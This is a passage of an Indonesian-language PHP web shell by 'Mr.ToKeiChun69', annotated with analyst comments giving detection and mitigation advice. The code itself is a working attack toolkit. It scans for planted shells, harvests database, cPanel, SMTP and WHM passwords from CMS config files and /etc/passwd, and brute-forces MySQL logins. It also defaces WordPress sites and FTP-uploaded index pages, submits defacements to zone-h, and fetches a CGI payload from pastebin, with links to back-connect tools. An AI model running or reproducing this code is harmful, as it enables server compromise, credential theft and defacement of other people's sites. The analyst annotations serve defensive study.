  2210. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
  2211. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
  2212. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
  2213. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
  2214. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
  2215. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
  2216. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
  2217. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
  2218. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
  2219. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
  2220. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
  2221. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
  2222. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
  2223. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","cox.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
  2224. foreach ($shells as $shell){
  2225. $headers = get_headers("$url$shell"); //
  2226. if (eregi('200', $headers[0])) {
  2227. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done :D</span><br /><br/><br/>"; //
  2228. $dz = fopen('shells.txt', 'a+');
  2229. $suck = "$url$shell";
  2230. fwrite($dz, $suck."\n");
  2231. }
  2232. }
  2233. echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
  2234. }
  2235.  
  2236. }
  2237. elseif($_GET['do'] == 'cpanel') {
  2238. if($_POST['crack']) {
  2239. $usercp = explode("\r\n", $_POST['user_cp']);
  2240. $passcp = explode("\r\n", $_POST['pass_cp']);
  2241. $i = 0;
  2242. foreach($usercp as $ucp) {
  2243. foreach($passcp as $pcp) {
  2244. if(@mysql_connect('localhost', $ucp, $pcp)) {
  2245. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  2246. } else {
  2247. $_SESSION[$ucp] = "1";
  2248. $_SESSION[$pcp] = "1";
  2249. $i++;
  2250. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  2251. }
  2252. }
  2253. }
  2254. }
  2255. if($i == 0) {
  2256. } else {
  2257. echo "<br>Nemu ".$i." Cpanel by <font color=lime>Mr.ToKeiChun69</font>";
  2258. }
  2259. } else {
  2260. echo "<center>
  2261. <form method='post'>
  2262. USER: <br>
  2263. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  2264. $_usercp = fopen("/etc/passwd","r");
  2265. while($getu = fgets($_usercp)) {
  2266. if($getu == '' || !$_usercp) {
  2267. echo "<font color=red>Can't read /etc/passwd</font>";
  2268. } else {
  2269. preg_match_all("/(.*?):x:/", $getu, $u);
  2270. foreach($u[1] as $user_cp) {
  2271. if(is_dir("/home/$user_cp/public_html")) {
  2272. echo "$user_cp\n";
  2273. }
  2274. }
  2275. }
  2276. }
  2277. echo "</textarea><br>
  2278. PASS: <br>
  2279. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  // Analyst note: cp_pass($dir) harvests stored database passwords from CMS config files.
  // It lists $dir with scandir(), skips anything that is not a regular file (no recursion),
  // reads each file whole, and classifies it by a marker string. For every match it
  // extracts one password value with ambilkata() (defined outside this excerpt; from its
  // call sites it appears to return the text between the two delimiter strings -- confirm)
  // and appends it, newline-terminated, to $pass.
  // The list is echoed, not returned: the function has no return statement, so the
  // caller's `$cp_pass = cp_pass($dir); echo $cp_pass;` adds nothing further. The echo
  // happens while the surrounding code has a <textarea name='pass_cp'> open, so the
  // values become the pre-filled candidate list for the credential-testing form.
  // Defensive takeaway: the technique depends on config files being readable by the PHP
  // process of another site, and on a database password being reused for a hosting
  // account. Per-site file ownership with restrictive modes on config files, and
  // unique database credentials, remove both preconditions.
  2280. function cp_pass($dir) {
  2281. $pass = "";
  2282. $dira = scandir($dir);
  2283. foreach($dira as $dirb) {
  2284. if(!is_file("$dir/$dirb")) continue;
  2285. $ambil = file_get_contents("$dir/$dirb");
  2286. if(preg_match("/WordPress/", $ambil)) {
  // WordPress marker: value taken after the text DB_PASSWORD', ' up to the next quote.
  2287. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  2288. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  // Joomla marker: first single-quoted value following the text `password = '`.
  2289. $pass .= ambilkata($ambil,"password = '","'")."\n";
  2290. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  // Magento marker: contents of the <password><![CDATA[...]]></password> element.
  2291. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  2292. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  // The same marker string is labelled "Lokomedia" by the user-edit branch earlier in this file.
  2293. $pass .= ambilkata($ambil,'password = "','"')."\n";
  2294. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  // The same marker set is labelled "OpenCart" by the user-edit branch earlier in this file.
  2295. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  2296. } elseif(preg_match("/client/", $ambil)) {
  // Any file containing "client": captures the rest of the first `password=` line.
  // Presumably aimed at a MySQL client option file -- confirm. The value is kept only
  // when it contains a double quote, and the quotes are removed before it is appended.
  2297. preg_match("/password=(.*)/", $ambil, $pass1);
  2298. if(preg_match('/"/', $pass1[1])) {
  2299. $pass1[1] = str_replace('"', "", $pass1[1]);
  2300. $pass .= $pass1[1]."\n";
  2301. }
  2302. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  // Presumably a WHMCS configuration file (the marker is a setting name) -- confirm.
  2303. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  2304. }
  2305. }
  2306. echo $pass;
  2307. }
  2308. $cp_pass = cp_pass($dir);
  2309. echo $cp_pass;
  2310. echo "</textarea><br>
  2311. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  2312. </form>
  2313. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  2314. }
  2315. } elseif($_GET['do'] == 'smtp') {
  2316. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  // Analyst note: scj($dir) prints SMTP settings found in Joomla configuration files.
  // It lists $dir with scandir(), skips non-regular files (no recursion), reads each
  // file whole and removes every "$" character from the text before matching.
  // For files matching /JConfig|joomla/ it extracts six values (host, auth, user, pass,
  // port, secure) with ambilkata() (defined outside this excerpt; from its call sites it
  // appears to return the text between the two delimiter strings -- confirm) and echoes
  // them into the page without HTML escaping.
  // The function has no return statement, so the caller's `$smpt_hunter = scj($dir);
  // echo $smpt_hunter;` prints nothing beyond what is echoed here.
  // Defensive takeaway: when this file is found on a host, any mail credentials stored
  // in configuration files readable by the web server user should be treated as
  // disclosed and rotated.
  2317. function scj($dir) {
  2318. $dira = scandir($dir);
  2319. foreach($dira as $dirb) {
  2320. if(!is_file("$dir/$dirb")) continue;
  2321. $ambil = file_get_contents("$dir/$dirb");
  2322. $ambil = str_replace("$", "", $ambil);
  2323. if(preg_match("/JConfig|joomla/", $ambil)) {
  2324. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  2325. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  2326. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  2327. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  2328. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  2329. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  2330. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  2331. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  2332. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  2333. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  2334. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  2335. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  2336. }
  2337. }
  2338. }
  2339. $smpt_hunter = scj($dir);
  2340. echo $smpt_hunter;
  2341. } elseif($_GET['do'] == 'auto_wp') {
  2342. if($_POST['hajar']) {
  2343. $title = htmlspecialchars($_POST['new_title']);
  2344. $pn_title = str_replace(" ", "-", $title);
  2345. if($_POST['cek_edit'] == "Y") {
  2346. $script = $_POST['edit_content'];
  2347. } else {
  2348. $script = $title;
  2349. }
  2350. $conf = $_POST['config_dir'];
  2351. $scan_conf = scandir($conf);
  2352. foreach($scan_conf as $file_conf) {
  2353. if(!is_file("$conf/$file_conf")) continue;
  2354. $config = file_get_contents("$conf/$file_conf");
  2355. if(preg_match("/WordPress/", $config)) {
  2356. $dbhost = ambilkata($config,"DB_HOST', '","'");
  2357. $dbuser = ambilkata($config,"DB_USER', '","'");
  2358. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2359. $dbname = ambilkata($config,"DB_NAME', '","'");
  2360. $dbprefix = ambilkata($config,"table_prefix = '","'");
  2361. $prefix = $dbprefix."posts";
  2362. $option = $dbprefix."options";
  2363. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2364. $db = mysql_select_db($dbname);
  2365. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  2366. $result = mysql_fetch_array($q);
  2367. $id = $result[ID];
  2368. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2369. $result2 = mysql_fetch_array($q2);
  2370. $target = $result2[option_value];
  2371. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  2372. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  2373. echo "<div style='margin: 5px auto;'>";
  2374. if($target == '') {
  2375. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  2376. } else {
  2377. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  2378. }
  2379. if(!$update OR !$conn OR !$db) {
  2380. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  2381. } else {
  2382. echo "<font color=lime>sukses di ganti.</font><br>";
  2383. }
  2384. echo "</div>";
  2385. mysql_close($conn);
  2386. }
  2387. }
  2388. } else {
  2389. echo "<center>
  2390. <h1>Auto Edit Title+Content WordPress</h1>
  2391. <form method='post'>
  2392. DIR Config: <br>
  2393. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  2394. Set Title: <br>
  2395. <input type='text' name='new_title' value='Hacked By Mr.ToKeiChun69' placeholder='New Title'><br><br>
  2396. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  2397. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  2398. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  2399. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  2400. </form>
  2401. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  2402. ";
  2403. }
  2404. } elseif($_GET['do'] == 'zoneh') {
  2405. if($_POST['submit']) {
  2406. $domain = explode("\r\n", $_POST['url']);
  2407. $nick = $_POST['nick'];
  2408. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  2409. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  // Analyst note: zoneh($url, $nick) sends one HTTP POST to the zone-h notification
  // endpoint and returns the response body as a string (CURLOPT_RETURNTRANSFER is set).
  // The caller greps that body for an "OK" marker to print a per-domain status.
  // $nick and $url are interpolated into the form body as-is.
  // The curl_close() call sits after the return statement and is never reached.
  // Defensive takeaway: the request originates from the web server process itself, so
  // an outbound POST from a PHP worker to this host is a network-level indicator, and
  // egress filtering for web server processes blocks this step.
  2410. function zoneh($url,$nick) {
  2411. $ch = curl_init("http://www.zone-h.com/notify/single");
  2412. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2413. curl_setopt($ch, CURLOPT_POST, true);
  2414. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  2415. return curl_exec($ch);
  2416. curl_close($ch);
  2417. }
  2418. foreach($domain as $url) {
  2419. $zoneh = zoneh($url,$nick);
  2420. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  2421. echo "$url -> <font color=lime>OK</font><br>";
  2422. } else {
  2423. echo "$url -> <font color=red>ERROR</font><br>";
  2424. }
  2425. }
  2426. } else {
  2427. echo "<center><form method='post'>
  2428. <u>Defacer</u>: <br>
  2429. <input type='text' name='nick' size='50' value='Mr.ToKeiChun69'><br>
  2430. <u>Domains</u>: <br>
  2431. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  2432. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  2433. </form>";
  2434. }
  2435. echo "</center>";
  2436. }elseif($_GET['do'] == 'cpftp_auto') {
  2437. if($_POST['crack']) {
  2438. $usercp = explode("\r\n", $_POST['user_cp']);
  2439. $passcp = explode("\r\n", $_POST['pass_cp']);
  2440. $i = 0;
  2441. foreach($usercp as $ucp) {
  2442. foreach($passcp as $pcp) {
  2443. if(@mysql_connect('localhost', $ucp, $pcp)) {
  2444. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  2445. } else {
  2446. $_SESSION[$ucp] = "1";
  2447. $_SESSION[$pcp] = "1";
  2448. if($ucp == '' || $pcp == '') {
  2449. //
  2450. } else {
  2451. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  2452. $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
  2453. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  2454. if((!$ftp_login) || (!$ftp_conn)) {
  2455. echo "[+] <font color=red>Login Gagal</font><br><br>";
  2456. } else {
  2457. echo "[+] <font color=lime>Login Sukses</font><br>";
  2458. $fi = htmlspecialchars($_POST['file_deface']);
  2459. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  2460. if($deface) {
  2461. $i++;
  2462. echo "[+] <font color=lime>Deface Sukses</font><br>";
  2463. if(function_exists('posix_getpwuid')) {
  2464. $domain_cp = file_get_contents("/etc/named.conf");
  2465. if($domain_cp == '') {
  2466. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  2467. } else {
  2468. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  2469. foreach($domains_cp[1] as $dj) {
  2470. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2471. $user_cp_url = $user_cp_url['name'];
  2472. if($user_cp_url == $ucp) {
  2473. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  2474. break;
  2475. }
  2476. }
  2477. }
  2478. } else {
  2479. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  2480. }
  2481. } else {
  2482. echo "[-] <font color=red>Deface Gagal</font><br><br>";
  2483. }
  2484. }
  2485. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  2486. }
  2487. }
  2488. }
  2489. }
  2490. }
  2491. if($i == 0) {
  2492. } else {
  2493. echo "<br>Sukses Deface ".$i." Cpanel by <font color=lime>Mr.ToKeiChun69.</font>";
  2494. }
  2495. } else {
  2496. echo "<center>
  2497. <form method='post'>
  2498. Filename: <br>
  2499. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  2500. Deface Page: <br>
  2501. <input type='text' name='deface' placeholder='http://www.web-yang-udah-do-deface.com/filemu.php' style='width: 450px;'><br>
  2502. USER: <br>
  2503. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  2504. $_usercp = fopen("/etc/passwd","r");
  2505. while($getu = fgets($_usercp)) {
  2506. if($getu == '' || !$_usercp) {
  2507. echo "<font color=red>Can't read /etc/passwd</font>";
  2508. } else {
  2509. preg_match_all("/(.*?):x:/", $getu, $u);
  2510. foreach($u[1] as $user_cp) {
  2511. if(is_dir("/home/$user_cp/public_html")) {
  2512. echo "$user_cp\n";
  2513. }
  2514. }
  2515. }
  2516. }
  2517. echo "</textarea><br>
  2518. PASS: <br>
  2519. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  // Analyst note: second, textually identical declaration of cp_pass(); it lives in a
  // different `do=` branch from the first, so only one of the two is declared per request.
  // It lists $dir with scandir(), skips non-regular files (no recursion), reads each file
  // whole, classifies it by a marker string, and extracts one stored password per match
  // with ambilkata() (defined outside this excerpt; from its call sites it appears to
  // return the text between the two delimiter strings -- confirm).
  // The newline-separated list is echoed, not returned (there is no return statement),
  // while the surrounding code has a <textarea name='pass_cp'> open, so it pre-fills the
  // candidate list of the form that follows.
  // Defensive takeaway: restrictive ownership and modes on CMS config files, and database
  // passwords that are not reused for hosting or FTP accounts, remove the preconditions
  // this branch relies on.
  2520. function cp_pass($dir) {
  2521. $pass = "";
  2522. $dira = scandir($dir);
  2523. foreach($dira as $dirb) {
  2524. if(!is_file("$dir/$dirb")) continue;
  2525. $ambil = file_get_contents("$dir/$dirb");
  2526. if(preg_match("/WordPress/", $ambil)) {
  // WordPress marker: value taken after the text DB_PASSWORD', ' up to the next quote.
  2527. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  2528. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  // Joomla marker: first single-quoted value following the text `password = '`.
  2529. $pass .= ambilkata($ambil,"password = '","'")."\n";
  2530. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  // Magento marker: contents of the <password><![CDATA[...]]></password> element.
  2531. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  2532. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  // The same marker string is labelled "Lokomedia" by the user-edit branch earlier in this file.
  2533. $pass .= ambilkata($ambil,'password = "','"')."\n";
  2534. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  // The same marker set is labelled "OpenCart" by the user-edit branch earlier in this file.
  2535. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  2536. } elseif(preg_match("/client/", $ambil)) {
  // Any file containing "client": captures the rest of the first `password=` line.
  // Presumably aimed at a MySQL client option file -- confirm. The value is kept only
  // when it contains a double quote, and the quotes are removed before it is appended.
  2537. preg_match("/password=(.*)/", $ambil, $pass1);
  2538. if(preg_match('/"/', $pass1[1])) {
  2539. $pass1[1] = str_replace('"', "", $pass1[1]);
  2540. $pass .= $pass1[1]."\n";
  2541. }
  2542. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  // Presumably a WHMCS configuration file (the marker is a setting name) -- confirm.
  2543. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  2544. }
  2545. }
  2546. echo $pass;
  2547. }
  2548. $cp_pass = cp_pass($dir);
  2549. echo $cp_pass;
  2550. echo "</textarea><br>
  2551. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  2552. </form>
  2553. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  2554. }
  2555. } elseif($_GET['do'] == 'cgi') {
  // Analyst note: this branch drops a second-stage CGI script next to the shell.
  // Artefacts it leaves in the shell's working directory, all visible below:
  //   - a directory named "cgi" (mode 0755); the mkdir() result in $cgi_dir is never checked
  //   - ".htaccess", opened with mode "w", so any existing file is truncated and replaced
  //     by the single line "AddHandler cgi-script .izo"
  //   - "cgi/cgi.izo" (mode 0755), whose content is downloaded at run time
  // getsource() is defined outside this excerpt; presumably it returns the body of the
  // given URL -- confirm.
  // Detection: an .htaccess whose only content maps an unusual extension to cgi-script,
  // a newly created executable file with that extension, and an outbound fetch of a
  // raw paste from the web server process.
  // Mitigation: an AllowOverride setting that does not permit handler changes from
  // .htaccess, `Options -ExecCGI` on content directories, and file-integrity monitoring
  // of .htaccess files.
  2556. $cgi_dir = mkdir('cgi', 0755);
  2557. $file_cgi = "cgi/cgi.izo";
  2558. $isi_htcgi = "AddHandler cgi-script .izo";
  2559. $htcgi = fopen(".htaccess", "w");
  2560. fwrite($htcgi, $isi_htcgi);
  2561. fclose($htcgi);
  // The payload is not embedded in this file; it is fetched at run time, so the shell
  // itself contains no CGI code for a static scanner to match.
  2562. $cgi_script = getsource("https://pastebin.com/raw.php?i=amaDeGWf");
  2563. $cgi = fopen($file_cgi, "w");
  2564. fwrite($cgi, $cgi_script);
  2565. fclose($cgi);
  2566. chmod($file_cgi, 0755);
  // The dropped script is then loaded in an iframe, which requests it through the web server.
  2567. echo "<iframe src='cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  2568. }
  2569. elseif($_GET['do'] == 'tool') {
  2570. echo "<center>";
  2571. echo "<ul>";
  2572. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  2573. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  2574. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  2575. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  2576. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  2577. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  2578. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  2579. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  2580. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  2581. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  2582. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  2583. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  2584. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  2585. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  2586. echo "</ul>";
  2587. echo "</center>";
  2588. }
  2589. elseif($_GET['do'] == 'manjat') {
  2590. echo "<center>";
  2591. echo "<ul>";
  2592. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  2593. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  2594. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  2595. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  2596. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  2597. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  2598. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  2599. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  2600. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  2601. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  2602. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  2603. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  2604. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  2605. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  2606. echo "</ul>";
  2607. echo "</center>";
  2608.  
  2609. echo "<center>";
  2610. $d0mains = @file('/etc/named.conf');
  2611. $domains = scandir("/var/named");
  2612.  
  2613. if ($domains or $d0mains)
  2614. {
  2615. $domains = scandir("/var/named");
  2616. if($domains) {
  2617. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th></tr>";
  2618. $count=1;
  2619. $dc = 0;
  2620. $list = scandir("/var/named");
  2621. foreach($list as $domain){
  2622. if(strpos($domain,".db")){
  2623. $domain = str_replace('.db','',$domain);
  2624. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  2625. $dirz = '/home/'.$owner['name'].'/cpanel3-skel';
  2626. $path = getcwd();
  2627.  
  2628. if (is_readable($dirz)) {
  2629. copy($dirz, ''.$path.'/lol/'.$owner['name'].'.txt');
  2630. $p=file_get_contents(''.$path.'/lol/'.$owner['name'].'.txt');
  2631. $password=entre2v2($p,'password="','"');
  2632. echo "<tr><td>".$count++."</td><td><a href='http://$domain' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td></tr>";
  2633. $dc++;
  2634. }
  2635.  
  2636. }
  2637. }
  2638. echo '</table>';
  2639. $total = $dc;
  2640. echo '<br><div class="result">Total WHM User Found = '.$total.'</h3><br />';
  2641. echo '</center>';
  2642. }else{
  2643. $d0mains = @file('/etc/named.conf');
  2644. if($d0mains) {
  2645. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th></tr>";
  2646. $count=1;
  2647. $dc = 0;
  2648. $mck = array();
  2649. foreach($d0mains as $d0main){
  2650. if(@eregi('zone',$d0main)){
  2651. preg_match_all('#zone "(.*)"#',$d0main,$domain);
  2652. flush();
  2653. if(strlen(trim($domain[1][0])) >2){
  2654. $mck[] = $domain[1][0];
  2655. }
  2656. }
  2657. }
  2658. $mck = array_unique($mck);
  2659. $usr = array();
  2660. $dmn = array();
  2661. foreach($mck as $o) {
  2662. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  2663. $usr[] = $infos['name'];
  2664. $dmn[] = $o;
  2665. }
  2666. array_multisort($usr,$dmn);
  2667. $dt = file('/etc/passwd');
  2668. $passwd = array();
  2669. foreach($dt as $d) {
  2670. $r = explode(':',$d);
  2671. if(strpos($r[5],'home')) {
  2672. $passwd[$r[0]] = $r[5];
  2673. }
  2674. }
  2675. $l=0;
  2676. $j=1;
  2677. foreach($usr as $r) {
  2678. $dirz = '/home/'.$r.'/cpanel3-skel';
  2679. $path = getcwd();
  2680. if (is_readable($dirz)) {
  2681. copy($dirz, ''.$path.'/lol/'.$r.'.txt');
  2682. $p=file_get_contents(''.$path.'/lol/'.$r.'.txt');
  2683. $password=entre2v2($p,'password="','"');
  2684. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td></tr>";
  2685. $dc++;
  2686. flush();
  2687. $l=$l?0:1;
  2688. $j++;
  2689. }
  2690. }
  2691. }
  2692. echo '</table>';
  2693. $total = $dc;
  2694. echo '<br><div class="result">Total WHM Account Found = '.$total.'</h3><br />';
  2695. echo '</center>';
  2696.  
  2697. }
  2698. }
  2699.  
  2700. }
  2701. elseif($_GET['do'] == 'smtp') {
  2702. echo "<center>";
  2703. echo "<ul>";
  2704. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  2705. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  2706. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  2707. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  2708. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  2709. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  2710. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  2711. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  2712. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  2713. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
